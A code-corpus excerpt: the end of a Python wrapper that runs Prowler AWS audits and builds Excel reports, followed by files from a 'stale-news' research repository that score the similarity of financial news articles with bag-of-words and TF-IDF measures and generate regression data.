cmdopts += ' -c {}'.format(quote(args.prowlerCheck))
if args.prowlerGroup is not None:
cmdopts += ' -g {}'.format(quote(args.prowlerGroup))
logging.info(cmd+cmdopts)
if verbose:
print(cmd+cmdopts)
p = subprocess.run([cmd + cmdopts], shell=True, text=True, check=False,
capture_output=True)
logging.debug("Inside run_prowler - subprocess: ")
logging.info(p)
if verbose:
print("Inside run_prowler - subprocess")
print(p)
resultDict[x] = p.stdout
fname = 'prowler-' + str(int(scanTime)) + '-' + str(scanUUID)\
+ '-' + quote(x) + '.csv'
fname = outputDir + '/' + fname
f = open(fname, 'w')
f.write(p.stdout)
f.close()
def worker():
global logging
global q
global resultDict
global verbose
while True:
x = q.get()
if x is None: # EOF?
return
else:
logging.debug("Inside worker: " + x)
if verbose:
print("Inside worker: " + x)
run_prowler(x)
def check_args_organizations(args):
global logging
pass
# # Handle Organizations and use it to create list of accounts to audit
# if not args.organization:
# logging.info("No AWS Organization Account")
# if verbose:
# print("No AWS Organization Account")
# else:
# print("Not implemented yet")
def get_col_widths(dataframe, index):
# First we find the maximum length of the index column
if index:
idx_max = max([len(str(s)) for s in dataframe.index.values]
+ [len(str(dataframe.index.name))])
return [idx_max] + [max([len(str(s)) for s in dataframe[col].values]
+ [len(col)]) for col in dataframe.columns]
else:
# Then, we concatenate this to the max of the lengths of column name
# and its values for each column, left to right
return [max([len(str(s)) for s in dataframe[col].values]
+ [len(col)]) for col in dataframe.columns]
def process_results(resultFileName):
global args
global logging
if 'verbose' in globals():
verbose = True
else:
verbose = False
if args.resultsFile:
excelName = args.resultsFile.split('.')[0] + '.xlsx'
else:
excelName = 'results-'+str(int(scanTime))+'-'+str(scanUUID)+'.xlsx'
if 'outputDir' in globals():
excelName = outputDir + '/' + excelName
p_df = pd.read_csv(resultFileName,
dtype={'ACCOUNT_NUM': str, 'TITLE_ID': str})
if verbose:
print(p_df.shape)
print(p_df)
writer = pd.ExcelWriter(excelName, engine='xlsxwriter')
workbook = writer.book
# Write Summary first
q3 = ('(LEVEL == "Level 1" or LEVEL == "Level 2") and '
'(RESULT == "PASS" or RESULT == "FAIL")')
p_df_pass = p_df.query(q3)
if verbose:
print(p_df_pass)
p_df_pass.groupby(['PROFILE', 'ACCOUNT_NUM', 'RESULT'])['RESULT'].count().to_excel(writer, sheet_name="Summary")
worksheet = writer.sheets['Summary']
for i, width in enumerate(get_col_widths(p_df, False)):
worksheet.set_column(i, i, width)
# Write raw results to Excel
p_df.to_excel(writer, sheet_name='RawResults', index=False)
worksheet = writer.sheets['RawResults']
for i, width in enumerate(get_col_widths(p_df, False)):
worksheet.set_column(i, i, width)
# Write Passing results to Excel
q1 = 'RESULT == "PASS"'
p_df_pass = pd.pivot_table(
p_df.query(q1),
index=['TITLE_ID', 'TITLE_TEXT'],
columns=['PROFILE', 'ACCOUNT_NUM'], values='RESULT',
aggfunc=np.count_nonzero, fill_value=0)
p_df_pass.to_excel(writer, sheet_name="All Passing")
# Write Failing results to Excel
q2 = 'RESULT == "FAIL"'
p_df_fail = pd.pivot_table(
p_df.query(q2),
index=['TITLE_ID', 'TITLE_TEXT'],
columns=['PROFILE', 'ACCOUNT_NUM'], values='RESULT',
aggfunc=np.count_nonzero, fill_value=0)
p_df_fail.to_excel(writer, sheet_name="All Failing")
# Write CIS Benchmarks Passing results to Excel
q3 = 'RESULT == "PASS" and (LEVEL == "Level 1" or LEVEL == "Level 2")'
p_df_cis_pass = pd.pivot_table(
p_df.query(q1),
index=['TITLE_ID', 'LEVEL', 'SCORED', 'TITLE_TEXT'],
columns=['PROFILE', 'ACCOUNT_NUM'], values='RESULT',
aggfunc=np.count_nonzero, fill_value=0)
p_df_cis_pass.to_excel(writer, sheet_name="CIS Benchmarks Passing")
# Write CIS Benchmarks failing results to Excel
q4 = 'RESULT == "FAIL" and (LEVEL == "Level 1" or LEVEL == "Level 2")'
p_df_cis_fail = pd.pivot_table(
p_df.query(q2),
index=['TITLE_ID', 'LEVEL', 'SCORED', 'TITLE_TEXT'],
columns=['PROFILE', 'ACCOUNT_NUM'], values='RESULT',
aggfunc=np.count_nonzero, fill_value=0)
p_df_cis_fail.to_excel(writer, sheet_name="CIS Benchmarks Failing")
print("Report Excel File: " + excelName)
writer.save()
def main():
global logging
parser = argparse.ArgumentParser()
setup_args(parser)
global args
args = parser.parse_args()
if not args.resultsFile:
process_args(args)
global resultDict
resultDict = {}
global scanUUID
global scanTime
# Generate a Testing UUID and TimeStamp to add to logs / results
scanUUID = uuid.uuid4()
scanTime = time.time()
logging.info(scanUUID)
logging.info(int(scanTime))
if verbose:
print(scanUUID)
print(int(scanTime))
# setting up queues
global q
q = queue.Queue()
# process workingProfiles, run assessment tool(s) against each Profile
for x in workingProfiles:
q.put(x)
if args.maxthreads and args.maxthreads > 0:
maxthreads = int(args.maxthreads)
else:
maxthreads = psutil.cpu_count(logical=False)
threads = [threading.Thread(target=worker) for _i in range(maxthreads)]
for thread in threads:
thread.start()
q.put(None) # one EOF marker for each thread
for thread in threads:
thread.join()
header = False
resultFileName = 'results-'+str(int(scanTime))+'-'+str(scanUUID)+'.csv'
resultFileName = outputDir + '/' + resultFileName
print("Opening CSV")
resultFile = open(resultFileName, 'w+')
for key in resultDict:
print("resultDict Key: " + key)
print("Value:")
print(resultDict[key])
for i in range(len(resultDict[key].split('\n'))):
if header:
if 'ACCOUNT_NUM' not in resultDict[key].split('\n')[i]:
resultFile.write(resultDict[key].split('\n')[i] + "\n")
else:
print("Writing Headers")
resultFile.write(resultDict[key].split('\n')[0] + "\n")
header = True
resultFile.close()
print("Result File: " + resultFileName)
process_results(resultFileName)
else:
if os.path.exists(args.resultsFile):
process_results(args.resultsFile)
else:
print('File unreadable: ' + str(args.resultsFile))
log.error('File unreadable: ' + str(args.resultsFile))
if __name__ == "__main__":
# execute only if run as a script
main()
``` |
{
"source": "JonathanBodine/stale-news",
"score": 3
} |
#### File: code/measures/article.py
```python
import datetime
from dateutil import parser
import pytz
class Article:
def __init__(self, company, timestamp, headline, article_text, md5_id):
self.company = company
est = pytz.timezone('US/Eastern')
self.timestamp = parser.parse(timestamp).replace(tzinfo=pytz.utc).astimezone(est)
self.headline = headline
# article_text should be stemmed and filtered articles
self.article_text = article_text
self.md5_id = md5_id
def __repr__(self):
return self.company + "; " + str(self.timestamp) + "; " + self.headline
def __eq__(self, other):
if isinstance(other, Article):
return (self.company == other.company and self.timestamp == other.timestamp and
self.headline == other.headline)
return False
def __lt__(self, other):
"""
Comparison operator for sorting Articles by timestamp.
"""
return self.timestamp < other.timestamp
def __hash__(self):
return hash(self.__repr__())
def elapsed_time_between(self, other):
"""
Returns the amount of time, in seconds, between the publishing
of this Article and another Article, other.
"""
elapsed_time = self.timestamp - other.timestamp
return abs(elapsed_time.total_seconds())
```
#### File: code/measures/cosine_similarity.py
```python
from article import Article
from measure_constants import MeasureConstants
import numpy as np
import datetime
from nltk.stem import PorterStemmer
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
from sklearn.feature_extraction.text import TfidfVectorizer
stop_words = set(stopwords.words('english'))
ps = PorterStemmer()
vec = TfidfVectorizer()
class CosineSimilarity:
def __init__(self, measure_const = MeasureConstants()):
self.measure_const = measure_const
def stem_and_filter(self, text):
"""
Takes an article's text and tokenizes the article text into a set, then
removes stop words from the set and stems all the remaining words. Returns
a set of stemmed words in the article.
"""
tokenized = word_tokenize(text)
tokenized = [w for w in tokenized if w not in stop_words] # Remove stop words from tokenized text
stemmed = " ".join([ps.stem(w) for w in tokenized])
return stemmed
def bow_similarity_score(self, s1, s2):
"""
Returns the bag-of-words similarity score between an article s1 and article s2.
Specifically, measures percentage of words in s1 that are also in s2.
s1, s2 must be sets representing tokenized and stemmed articles.
"""
return len(s1.intersection(s2)) / len(s1)
def compute_sim_measure(self, curr_article, article_set):
"""
Calculates Old(s) and ClosestNeighbor(s), where s is curr_article.
Arguments:
curr_article: An Article object for which to calculate the scores
article_set: A set of Article objects with the same company as curr_article.company
num_closest: The number of closest (by similarity score) stories to look at
to calculate Old(s)
Returns:
old_score: Old(s)
closest_neighbor_score: ClosestNeighbor(s)
"""
num_closest = self.measure_const.NUM_CLOSEST
curr_article_stemmed = set(curr_article.article_text.split())
stemmed_articles = [curr_article.article_text] + [s.article_text for s in article_set]
td_matrix = vec.fit_transform(stemmed_articles)
# Using the following method to calculate cosine similarity between documents:
# https://stackoverflow.com/questions/8897593/how-to-compute-the-similarity-between-two-text-documents
# The following line takes the term-document matrix (where each document is represented by a column
# vector and each row corresponds to a term), and computes the outer product of the term-document
# matrix with itself. The result is a symmetric matrix, the first row of which is the cosine similarity
# between the first document and every document in stemmed_articles. Here, I take the first row, and exclude
# the first item so we don't include curr_article's cosine similarity with itself.
sim_scores = (td_matrix * td_matrix.T).A[0][1:]
closest_articles_indices = np.argsort(sim_scores)[::-1][:num_closest]
closest_articles = np.take(stemmed_articles, closest_articles_indices)
closest_articles_words = [c.split() for c in closest_articles]
closest_articles_union = set().union(*closest_articles_words)
intersect_with_closest_n = curr_article_stemmed.intersection(closest_articles_union)
old_score = len(intersect_with_closest_n) / len(curr_article_stemmed)
closest_neighbor_score = self.bow_similarity_score(curr_article_stemmed, closest_articles_words[0])
return old_score, closest_neighbor_score
def is_old_news(self, old):
return old > self.measure_const.OLD_NEWS
def is_reprint(self, old, closest_neighbor):
if old == 0:
return False
reprint = (closest_neighbor / old) >= self.measure_const.CLOSEST_NEIGHBOR_SHARE
return (old > self.measure_const.OLD_NEWS) * reprint
def is_recombination(self, old, closest_neighbor):
if old == 0:
return False
reprint = (closest_neighbor / old) < self.measure_const.CLOSEST_NEIGHBOR_SHARE
return (old > self.measure_const.OLD_NEWS) * reprint
```
#### File: code/measures/sim_measures.py
```python
from measure_constants import MeasureConstants
from cosine_similarity import CosineSimilarity
from bow_similarity import BOWSimilarity
class SimiliarityMeasure:
def __init__(self, measure, measure_const = MeasureConstants()):
self.measure = None
if measure == "cosine":
self.measure = CosineSimilarity()
if measure == "bag_of_words":
self.measure = BOWSimilarity()
```
#### File: replication/deprecated/generate_reg_data.py
```python
import utils as u
import utilsp as up
import databases as d
import pandas as pd
def generate_csv8_9(dates, firms, mdatabase, pdatabase1, pdatabase2, eight=True):
"""
Writes csv file for computation over dates given
dates: list of days in order from starting date to ending date, each date represents a date t used for computation
firms: list of tickers of interest
mdatabase: database of news measures
pdatabase1: crsp data frame
pdatabase2: compustat data frame
eight: True computes equation 8, False computes equation 9
"""
# append one day at the end for very last t+1 query
if not pdatabase1.dates:
pdatabase1.recordDates("date", False) # "date" is a col name in crsp
extra_day_index = pdatabase1.dates.index(int(dates[len(dates) - 1])) + 1
dates.append(str(pdatabase1.dates[extra_day_index]))
# store data
lists = {'dependent': [], 'AbnPctOld': [], 'Stories': [], 'AbnStories': [], 'Terms': [], 'MCap': [],
'BM': [], 'AbnRet': [], 'AbnVol': [], 'AbnVolitility': [], 'Illiq': [], 'date': []}
entries = 0
# -1 to account for extra day appended
for i in range(len(dates) - 1):
print("DAY T: " + dates[i])
for firm in firms:
# skip firms where no data is available on date
if eight:
dependent_var = u.abnormalReturnDate(firm, dates[i + 1], pdatabase1, False)
if dependent_var == -1:
continue
else:
dependent_var = u.abnormalVolDate(firm, dates[i + 1], pdatabase1, False)
if dependent_var == -1:
continue
abn_pct_old = u.abnormalPercentageOld(firm, dates[i], mdatabase)
if abn_pct_old == -1:
continue
x = u.generateXList(firm, dates[i], mdatabase, pdatabase1, pdatabase2, False)
if not x:
continue
if eight:
lists['dependent'].append(abs(dependent_var))
else:
lists['dependent'].append(dependent_var)
lists['AbnPctOld'].append(abn_pct_old)
lists['Stories'].append(x[0])
lists['AbnStories'].append(x[1])
lists['Terms'].append(x[2])
lists['MCap'].append(x[3])
lists['BM'].append(x[4])
lists['AbnRet'].append(x[5])
lists['AbnVol'].append(x[6])
lists['AbnVolitility'].append(x[7])
lists['Illiq'].append(x[8])
lists['date'].append(dates[i])
entries += 1
# Create pandas data frame and to write out
df = pd.DataFrame({"date": lists['date'], "dependent": lists['dependent'], "AbnPctOld": lists['AbnPctOld'],
"Stories": lists['Stories'], "AbnStories": lists['AbnStories'], "Terms": lists['Terms'],
"MCap": lists['MCap'], "BM": lists['BM'], "AbnRet": lists['AbnRet'], "AbnVol": lists['AbnVol'],
"AbnVolitility": lists['AbnVolitility'], "Illiq": lists['Illiq']})
print("ENTRIES: " + str(entries))
print("COLUMNS: " + str(len(lists.keys())))
if eight:
# output fm_data_8_start_end.csv
df.to_csv('fm_data_8_' + str(dates[0]) + "_" + str(dates[len(dates) - 2]) + ".csv", index=False)
else:
# output fm_data_9_start_end.csv
df.to_csv('fm_data_9_' + str(dates[0]) + "_" + str(dates[len(dates) - 2]) + ".csv", index=False)
def generate_csv10_11(dates, firms, mdatabase, pdatabase1, pdatabase2, ten=True):
"""
Writes csv file for computation over dates given
dates: list of days in order from starting date to ending date, each date represents a date t used for computation
firms: list of tickers of interest
mdatabase: database of news measures
pdatabase1: crsp data frame
pdatabase2: compustat data frame
ten: True computes equation 10, False computes equation 11
equation (13) uses equation 10 computation, calling this function for each year
"""
# append one day at the end for very last t+1 query
if not pdatabase1.dates:
pdatabase1.recordDates("date", False) # "date" is a col name in crsp
extra_day_index = pdatabase1.dates.index(int(dates[len(dates) - 1])) + 1
dates.append(str(pdatabase1.dates[extra_day_index]))
# store data
lists = {'dependent': [], 'AbnPctOld': [], 'AbnPcrRecombinations': [], 'Stories': [], 'AbnStories': [],
'Terms': [], 'MCap': [], 'BM': [], 'AbnRet': [], 'AbnVol': [], 'AbnVolitility': [], 'Illiq': [],
'date': []}
entries = 0
# -1 to account for extra day appended
for i in range(len(dates) - 1):
print("DAY T: " + dates[i])
for firm in firms:
# skip firms where no data is available on date
if ten:
dependent_var = u.abnormalReturnDate(firm, dates[i + 1], pdatabase1, False)
if dependent_var == -1:
continue
else:
dependent_var = u.abnormalVolDate(firm, dates[i + 1], pdatabase1, False)
if dependent_var == -1:
continue
abn_pct_old = u.abnormalPercentageOld(firm, dates[i], mdatabase)
if abn_pct_old == -1:
continue
abn_pct_rec = u.abnormalPercentageRecombinations(firm, dates[i], mdatabase)
if abn_pct_rec == -1:
continue
x = u.generateXList(firm, dates[i], mdatabase, pdatabase1, pdatabase2, False)
if not x:
continue
if ten:
lists['dependent'].append(abs(dependent_var))
else:
lists['dependent'].append(dependent_var)
lists['AbnPctOld'].append(abn_pct_old)
lists['AbnPcrRecombinations'].append(abn_pct_rec)
lists['Stories'].append(x[0])
lists['AbnStories'].append(x[1])
lists['Terms'].append(x[2])
lists['MCap'].append(x[3])
lists['BM'].append(x[4])
lists['AbnRet'].append(x[5])
lists['AbnVol'].append(x[6])
lists['AbnVolitility'].append(x[7])
lists['Illiq'].append(x[8])
lists['date'].append(dates[i])
entries += 1
# Create pandas data frame and to write out
df = pd.DataFrame({"date": lists['date'], "dependent": lists['dependent'], "AbnPctOld": lists['AbnPctOld'],
"AbnPcrRecombinations": lists['AbnPcrRecombinations'], "Stories": lists['Stories'],
"AbnStories": lists['AbnStories'], "Terms": lists['Terms'], "MCap": lists['MCap'],
"BM": lists['BM'], "AbnRet": lists['AbnRet'], "AbnVol": lists['AbnVol'],
"AbnVolitility": lists['AbnVolitility'], "Illiq": lists['Illiq']})
print("ENTRIES: " + str(entries))
print("COLUMNS: " + str(len(lists.keys())))
if ten:
# output fm_data_10_start_end.csv
df.to_csv('fm_data_10_' + str(dates[0]) + "_" + str(dates[len(dates) - 2]) + ".csv", index=False)
else:
# output fm_data_11_start_end.csv
df.to_csv('fm_data_11_' + str(dates[0]) + "_" + str(dates[len(dates) - 2]) + ".csv", index=False)
def generate_csv12(dates, firms, mdatabase, pdatabase1, pdatabase2, t1, t2):
"""
Writes csv file for computation over dates given
dates: list of days in order from starting date to ending date, each date represents a date t used for computation
firms: list of tickers of interest
mdatabase: database of news measures
pdatabase1: crsp data frame
pdatabase2: compustat data frame
t1, t2: used for AbnRet date range [t+t1, t+t2] where t is current reference day
"""
# append t2 additional days at the end for last few dependent variable queries
if not pdatabase1.dates:
pdatabase1.recordDates("date", False) # "date" is a col name in crsp
extra_day_start_index = pdatabase1.dates.index(int(dates[len(dates) - 1])) + 1
for i in range(t2):
dates.append(str(pdatabase1.dates[extra_day_start_index + i]))
# store data
lists = {'dependent': [], 'AbnPcrOld': [], 'AbnPcrOldXAbnRet': [], 'AbnRet': [], 'AbnPcrRecombinations': [],
'AbnPcrRecombinationsXAbnRet': [], 'Stories': [], 'AbnStories': [], 'Terms': [], 'MCap': [], 'BM': [],
'AbnRetVect': [], 'AbnVol': [], 'AbnVolitility': [], 'Illiq': [], 'date': []}
entries = 0
# -t2 to account for extra days appended
for i in range(len(dates) - t2):
print("DAY T: " + dates[i])
for firm in firms:
# skip firms where no data is available on date
dependent_var = u.abnormalReturn(firm, dates[i + t1], dates[i + t2], pdatabase1, False)
if dependent_var == -1:
continue
abn_pcr_old = u.abnormalPercentageOld(firm, dates[i], mdatabase)
if abn_pcr_old == -1:
continue
abn_ret_next = u.abnormalReturnDate(firm, dates[i + 1], pdatabase1, False)
if abn_ret_next == -1:
continue
abn_pcr_rec = u.abnormalPercentageRecombinations(firm, dates[i], mdatabase)
if abn_pcr_rec == -1:
continue
x = u.generateXList(firm, dates[i], mdatabase, pdatabase1, pdatabase2, False)
if not x:
continue
lists['dependent'].append(dependent_var)
lists['AbnPcrOld'].append(abn_pcr_old)
lists['AbnPcrOldXAbnRet'].append(abn_pcr_old * abn_ret_next)
lists['AbnRet'].append(abn_ret_next)
lists['AbnPcrRecombinations'].append(abn_pcr_rec)
lists['AbnPcrRecombinationsXAbnRet'].append(abn_pcr_rec * abn_ret_next)
lists['Stories'].append(x[0])
lists['AbnStories'].append(x[1])
lists['Terms'].append(x[2])
lists['MCap'].append(x[3])
lists['BM'].append(x[4])
lists['AbnRetVect'].append(x[5])
lists['AbnVol'].append(x[6])
lists['AbnVolitility'].append(x[7])
lists['Illiq'].append(x[8])
lists['date'].append(dates[i])
entries += 1
# Create pandas data frame and to write out
df = pd.DataFrame({"date": lists['date'], "dependent": lists['dependent'], "AbnPcrOld": lists['AbnPcrOld'],
"AbnPcrOldXAbnRet": lists['AbnPcrOldXAbnRet'], "AbnRet": lists['AbnRet'],
"AbnPcrRecombinations": lists['AbnPcrRecombinations'],
"AbnPcrRecombinationsXAbnRet": lists['AbnPcrRecombinationsXAbnRet'],
"Stories": lists['Stories'], "AbnStories": lists['AbnStories'], "Terms": lists['Terms'],
"MCap": lists['MCap'], "BM": lists['BM'], "AbnRetVect": lists['AbnRetVect'],
"AbnVol": lists['AbnVol'], "AbnVolitility": lists['AbnVolitility'], "Illiq": lists['Illiq']})
print("ENTRIES: " + str(entries))
print("COLUMNS: " + str(len(lists.keys())))
# output fm_data_12_start_end_t1_t2.csv
df.to_csv('fm_data_10_' + str(dates[0]) + "_" + str(dates[len(dates) - t2 - 1])
+ "_" + str(t1) + "_" + str(t2) + ".csv", index=False)
```
#### File: replication/object/Article.py
```python
import dateutil.parser
import xml.etree.ElementTree as ET
from ETUtils import *
class Article:
"""
Class that represents a generic article.
"""
def __init__(self, text):
"""
Takes as input an XML string, and populates the features of an
article.
"""
try:
et = ET.fromstring(text) # Some articles do not parse correctly.
self.accessionNumber = accessionNum(et)
self.displayDate = dateutil.parser.parse(displayDate(et)).timestamp()
self.tickers = tickercreator(et)
self.text = article(et)
self.headline = headline(et)
self.bad = False
except:
self.bad = True
def __lt__(self, other):
"""
Used to break ties when ordering in a heap queue.
"""
return False
```
#### File: replication/object/BSBManager.py
```python
from multiprocessing import Process, Queue, Pipe
from Article import Article as Story
import csv
import os
from LL import *
import heapq
def processor(q, simObject, temp_save):
"""
Worker that will process a que of stories.
"""
with open(temp_save, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID', 'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB'])
companies = dict()
while True:
story, ticker = q.get(block=True)
if ticker == "ad mortem":
break
if ticker not in companies:
companies[ticker] = myLinkedList()
p = simObject.staleNewsProcedure(ticker, story, companies[ticker])
writer.writerow(p)
def supplier(pipe, Story, simObject):
"""
Worker that cleanes stories.
"""
while True:
et = pipe.recv()
if et == "ad mortem":
break
else:
s = Story(et)
simObject.preprocessing(s)
pipe.send(s)
def merge(endlocation, temp_files):
"""
Merges together sorted files into one laregr file. Deletes the temo_files
after the megre.
"""
files = [open(file, 'r') for file in temp_files]
filedata = {i: csv.reader(file, delimiter=',') for i, file in enumerate(files)}
temp = list()
for i in range(len(temp_files)):
next(filedata[i])
newline = next(filedata[i])
heapq.heappush(temp, (newline[0], i, newline))
with open(endlocation, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID', 'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB'])
while temp:
_, f, data = heapq.heappop(temp)
writer.writerow(data)
try:
newline = next(filedata[f])
except StopIteration:
newline = None
if newline:
heapq.heappush(temp, (newline[0], f, newline))
[file.close() for file in files]
[os.remove(file) for file in temp_files]
def worker_init(count, t, simObject=None):
"""
starts up the worker processes.
"""
workers, worker_processes = list(), list()
for i in range(count):
if t == "supplier":
a, b = Pipe()
worker = Process(target=supplier, args=((b), (Story), (simObject)))
worker.start()
workers.append(a)
worker_processes.append(worker)
elif t == "processor":
temp_save = f"temp_file_{i}.csv"
queue = Queue()
worker = Process(target=processor, args=((queue), (simObject), (temp_save)))
worker_processes.append(worker)
worker.start()
workers.append(queue)
return workers, worker_processes
```
#### File: code/replication/StaleNewsProcedureMultiprocessing.py
```python
import xml.etree.ElementTree as ET
import re
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import nltk
from nltk.stem.porter import *
from pytz import timezone
import dateutil.parser
import datetime
import heapq
import numpy as np
import csv
import sys
import os
import time
from multiprocessing import Process, Queue, Pipe, cpu_count
import glob
fs = glob.glob('data/*.nml')
eastern = timezone('US/Eastern')
stop_words = set(stopwords.words('english'))
stemmer = PorterStemmer()
stemDict = dict()
wordDict = dict()
def xmlTreeGetter(filename):
'''
A getter function for each article. When next is called, it will return the
next article. The files are split by the </doc> tag, which is at the end
of every article.
'''
nmlFile = open(filename)
text = ""
for line in nmlFile:
text += line
if "</doc>" in line:
yield ET.fromstring(text)
text = ""
def article(etree):
'''Given etree, return article'''
art = etree.find("djnml").find("body").find("text")
article = ""
if art is None:
return article
else:
for element in art:
article += element.text
return article
def headline(etree):
'''Given etree, return headline'''
return etree.find("djnml").find("body").find("headline").text
def tickercreator(etree):
'''Given etree, return ticker list'''
#ft.begin("tickercreator")
tik = etree.find("djnml").find("head").find("docdata").find("djn").find("djn-newswires").find("djn-mdata").find("djn-coding").find("djn-company")
tickers = []
if tik is None:
return tickers
for t in tik:
tickers += [t.text]
return tickers
def accessionNum(etree):
'''Given etree, return acession number'''
return etree.attrib['md5']
def displayDate(etree):
'''Given etree, reutrn display date'''
return etree.find("djnml").find("head").find("docdata").find("djn").find("djn-newswires").find("djn-mdata").attrib['display-date']
def stem(tokenizedWords):
"""
returns a set of stemed words.
"""
r = set()
for word in tokenizedWords:
if word in wordDict:
add = wordDict[word]
else:
add = stemmer.stem(word)
wordDict[word] = add
r.add(add)
return r
def stop(tokenizedWords):
"""
returns a set with stop words removed.
"""
filtered = set()
for word in tokenizedWords:
if word not in stop_words:
filtered.add(word)
return filtered
def similaritytest(orig, others):
"""
returns a similarity score between stemmed article orig
and a listed of stemmed articles.
"""
B = set.union(*[story.textWords for story in others])
A = orig.textWords.intersection(B)
return len(A) / len(orig.textWords)
def stale(origStory, neighborStories, simtest):
'''
Determines the staleness of news given origStory and neighborStories.
'''
r = [False, False, False, 0]
if (len(neighborStories) == 0):
return r
else:
others = [story_tuple[1] for story_tuple in neighborStories]
stale_score = simtest(origStory, others)
stale_max = neighborStories[0][0]
r[3] = stale_score
if (stale_score >= 0.6):
r[0] = True
if (stale_max >= 0.8):
r[1] = True
else:
r[2] = True
return r
def staleNewsProcedure(ticker, story, companies, simtest):
'''
Performs the stalen news procedure for one article. Returns the similarity
information for this article compared to the articles up to 72 hours prior.
'''
companyLL = companies[ticker]
companyLL.resetCurr()
compStory = companyLL.nextNode()
maxpq = []
while (compStory != None):
if story.displayDate - compStory.displayDate > 259200:
companyLL.cut();
break;
sim = simtest(story, [compStory])
heapq.heappush(maxpq, (sim, compStory))
compStory = companyLL.nextNode()
largestFive = heapq.nlargest(5, maxpq)
old_reprint_recomb = stale(story, largestFive, simtest)
companies[ticker].addFront(story)
if (largestFive != []):
largestacc = largestFive[0][1].accessionNumber
largestsim = largestFive[0][0]
else:
largestacc = None
largestsim = None
if (len(largestFive) > 1):
secondlargestacc = largestFive[1][1].accessionNumber
else:
secondlargestacc = None
return [story.displayDate, story.accessionNumber, ticker, len(story.textWords), largestacc, secondlargestacc, largestsim, old_reprint_recomb[3], old_reprint_recomb[0], old_reprint_recomb[1], old_reprint_recomb[2]]
class Story:
'''A story class. Contains all of the information useful from each story.'''
accessionNumber = 0
displayDate = 0
tickers = []
headline = ""
text = "";
textWords = set()
sim = -1
def __init__(self, et=None):
self.accessionNumber = accessionNum(et)
self.displayDate = dateutil.parser.parse(displayDate(et)).timestamp()
self.tickers = tickercreator(et)
self.text = article(et)
self.textWords = stop(stem(word_tokenize(article(et))))
self.headline = headline(et)
def from_other(self, number, date, tick, txt, s):
self.acessionNumber = number
self.displayDate = date
self.tickers = tick
self.text = txt
self.sim = s
def __lt__ (self, other):
if (type(other) == int):
return self.sim < other
return self.sim < other.sim
class myLinkedList:
'''
A linked list. One key property of this LL is that the next node can be
called with nextNode.If cut is called, the LL will be pruned (or cut) at
the location of nextNode, so that unnecessary information can be easily
removed.
'''
head = None
end = None
curr = None
def __init__(self):
self.head = LLNode("sentinel")
self.end = self.head
def addFront(self, val):
self.head.nextNode = LLNode(val, self.head.nextNode)
def resetCurr(self):
self.curr = self.head
def nextNode(self):
self.curr = self.curr.nextNode
if (self.curr == None):
return None
t = self.curr.val
return t
def cut(self):
self.curr.nextNode = None
class LLNode():
val = None;
nextNode = None;
def __init__(self, val=None, nextNode=None):
self.val = val
self.nextNode = nextNode
def processor(q, simtest, temp_save):
"""
Worker that will process a que of stories.
"""
with open(temp_save, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID', 'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB'])
companies = dict()
while True:
story, ticker = q.get(block=True)
if ticker == "ad mortem":
break
if ticker not in companies:
companies[ticker] = myLinkedList()
p = staleNewsProcedure(ticker, story, companies, simtest)
writer.writerow(p)
def supplier(pipe, Story):
"""
Worker that cleanes stories.
"""
while True:
et = pipe.recv()
if et == "ad mortem":
break
else:
pipe.send(Story(et))
def merge(endlocation, temp_files):
"""
Merges together sorted files into one laregr file. Deletes the temo_files
after the megre.
"""
files = [open(file, 'r') for file in temp_files]
filedata = {i: csv.reader(file, delimiter=',') for i, file in enumerate(files)}
temp = list()
for i in range(len(temp_files)):
next(filedata[i])
newline = next(filedata[i])
heapq.heappush(temp, (newline[0], i, newline))
with open(endlocation, 'w', newline='') as csvfile:
writer = csv.writer(csvfile, delimiter=',')
writer.writerow(['DATE_EST', 'STORY_ID', 'TICKER', 'STORY_LENGTH', 'CLOSEST_ID', 'SECOND_CLOSEST_ID', 'CLOSEST_SCORE', 'TOTAL_OVERLAP', 'IS_OLD', 'IS_REPRINT', 'IS_RECOMB'])
while temp:
_, f, data = heapq.heappop(temp)
writer.writerow(data)
try:
newline = next(filedata[f])
except StopIteration:
newline = None
if newline:
heapq.heappush(temp, (newline[0], f, newline))
[file.close() for file in files]
[os.remove(file) for file in temp_files]
def worker_init(count, t, simtest=None):
"""
starts up the worker processes.
"""
workers, worker_processes = list(), list()
for i in range(count):
if t == "supplier":
a, b = Pipe()
worker = Process(target=supplier, args=((b), (Story)))
worker.start()
workers.append(a)
worker_processes.append(worker)
elif t == "processor":
temp_save = f"temp_file_{i}.csv"
queue = Queue()
worker = Process(target=processor, args=((queue), (simtest), (temp_save)))
worker_processes.append(worker)
worker.start()
workers.append(queue)
return workers, worker_processes
def procedure(startlocation = 'data', endlocation='export_dataframe.csv', simtest=similaritytest, worker_count=-1):
'''
Performs the procedure for the specified amount of articles. Uses
all nml files from startlocation, and exports a csv file at endlocation.
'''
if worker_count < 0:
worker_count += cpu_count() + 1
worker_count = worker_count * 2
location = sorted(glob.glob(startlocation + '/*.nml'))
companies = dict()
suppliers, supplier_processes = worker_init(worker_count, "supplier")
processors, processor_processes = worker_init(worker_count, "processor", simtest)
for f in location:
print("File processing...",f)
xtg = xmlTreeGetter(f)
for supplier in suppliers:
try:
et = next(xtg)
except:
continue
supplier.send(et)
checks, load = 0, 0
while checks < len(suppliers):
for supplier in suppliers:
if checks >= len(suppliers):
break
story = supplier.recv()
try:
et = next(xtg)
supplier.send(et)
except:
checks += 1
if not (story.tickers == []):
for ticker in story.tickers:
if '.' in ticker:
continue
if ticker not in companies:
companies[ticker] = load
load = (load + 1) % worker_count
processors[companies[ticker]].put((story, ticker))
[a.send("ad mortem") for a in suppliers]
[w.join() for w in supplier_processes]
